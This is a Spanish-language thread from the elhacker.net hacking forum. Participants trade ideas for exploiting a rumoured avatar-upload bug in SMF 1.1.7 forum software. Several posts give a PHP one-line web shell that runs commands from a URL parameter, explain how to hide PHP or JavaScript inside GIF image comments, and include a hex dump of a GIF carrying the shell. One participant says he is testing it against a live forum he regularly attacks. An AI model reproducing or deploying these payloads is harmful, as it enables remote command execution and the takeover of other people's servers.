Foro de elhacker.net

Googleando he encontrado 2 temas en el foro oficial de SMF de que presuntamente hay un bug en la version 1.1.7 aunque no se cual de los 2 caminos es uno apunta a los perfiles y avatares y otro a un ataque sql injeccion.

Que Saben del tema, que pueden aportar??

Saludos, Dacan  :D

Eso de la falla de los avatares y perfiles está unos post mas abajo:
http://foro.elhacker.net/bugs_y_exploits/smf_116_multiples_fallas-t234159.0.html

Pero eso es para 1.1.6 no para la última, si se hubiera publicado alguna ya lo hubieran actualizado asi que veo muy poco probable que haya alguno (por lo menos público).

Español:
http://www.simplemachines.org/community/index.php?topic=280086.0
http://www.simplemachines.org/community/index.php?topic=278740.0

Ingles:
http://www.simplemachines.org/community/index.php?topic=279068.0

Según los temas pueden ser 2 caminos hacia el bug ademas como pusieron este código en un archivo gif ya que si lo intentas SMF dice que tu archivo excede el tamaño permitido.

<? if(isset($_GET[cmd])) system($_GET[cmd]) ?>
Saludos, Dacan  :D

Bueno, segun lei los Post ahi en simplemachines, Ocupas 2 cosas tener system activado en el PHP y ademas poder subir Avatars al foro.

Saludos.

Si pero como puedes poner código PHP en un gif, antes había visto un tutorial que explicaba como inyectar código PHP en los comentarios de un imagen pero eran del formato .jpg

Saludos, Dacan  :D

Aqui hay un ejemplo

http://ha.ckers.org/blog/20070623/hiding-js-in-valid-images/

Saludos

Me podrías dar un ejemplo lo leí y luego lo traduje lo que que intendi fue que se puede poner código javascript en una imagen  agregando = 1 y “/*” and “*/”.

Osea abro una imagen .gif con bloc de notas y donde pongo el =1 y los comentarios y en que parte el código javascript ejemplo de redireccion.

Saludos, Dacan  :D

Que tal Dacan, no es con el notepad de windows ocupas algun editor especial tipo hexadecimal para que no pierdas datos el gif, hay programas graficos como el gimp u otros que te permiten agregar comentarios.

Saludos.

disculpen mi ignorancia sobre rfi pero en los casos en los que se utilizarian
<?php system($_GET[cmd]); ?>
o
<? if(isset($_GET[cmd])) system($_GET[cmd]) ?>
serian si el server donde esta alojado corre bajo windows no? si es un unix tambien funcionaria?

Hola que tal, sobre tu duda


Las funciones son propias de PHP no importa el sistema, siempre y cuando esten activadas dichas funciones. la de isset es obvio que va a estar, pero la de system() puede ser que este bloqueada o restringida.

Saludos.

gracias por la aclaracion  ;D
asi que si quiero inyectar codigo JS tengo que usar "= 1 y “/*” and “*/”."
y si solo quiero agregar la shellcita <?php system($_GET[cmd]); ?>
tengo que dejar la cabecera tal como esta no? (GIF89a)
quedaria algo asi hexadecimalmente

<sub>474946383961000100800100000000FFFFFF21FE133C3F70687020

73797374656D28245F4745545B636D645D293B203F3E002C000000000

10001000002024401003B</sub>

Bien si vemos si lo vemos como javascript se prodria entender un poco mejor.

GIF89a=1
/*Basura Binaria whatever!!*/
alert("xD");
/*Mas basura*/
 

Eso es para injectar JS desde alguna pagina vulnerable, se podria injectar PHP o cualquier otro leguje, sin embargo
para el php como pueden ver en la imagen de muestra de ese ejemplo:
:http://www.flickr.com/photos/matteocarli/580869084/

No importan los caracteres Binarios, ahora lo que si importa es el navegador. shimpei no me he puesto a ver la secuencia hexadecimal que se genera pero me imagino que si entendistes el ejemplo si va a funcionar.

Saludos!

si lo entendi, estoy probandolo en un smf 1.1.7 al cual siempre le tiro XD
lo unico que consegui es que intentando el phpinfo me tire un error 500  XD
seguire viendo si se puede hacer algo pero de momento inyecte ambos codigos y los subi como avatar y no paso nada

Recuerda no es seguro de que exista dicho bug pero lo mas probable ya que segun el encontraron  esos códigos.

Creo que debe ser así:  imagen.gif?cmd=Is (Ejemplo)

Me podrías pasar la imagen gif con el código ya inyectado, te lo agradecería mucho. 

Saludos, Dacan  :D

a menos que quieras inyectar codigo JS solo basta con que con el gimp lo agreges como comentario. si queres te la spaso por pm.
aun no entiendo muy bien como se dispararia la shell, para ver un avatar seria asi la direccion http://www.explotame.com/foro/index.php?action=dlattach;attach=110;type=avatar
como habria que manipularla?

me parece que las nueves versiones de smf convierten las imagenes a png despues de que se suben asi que en ese transpaso se borra la ***** que le agregamos XD
voy a seguri haciendo pruebas al respecto

saludos

// si efectivamente tiene que ser una animacion si o si lo que subimos sino el smf la convierte en png.

a todo esto como se lanzaria el comentario que tenemos en la imagen en shell?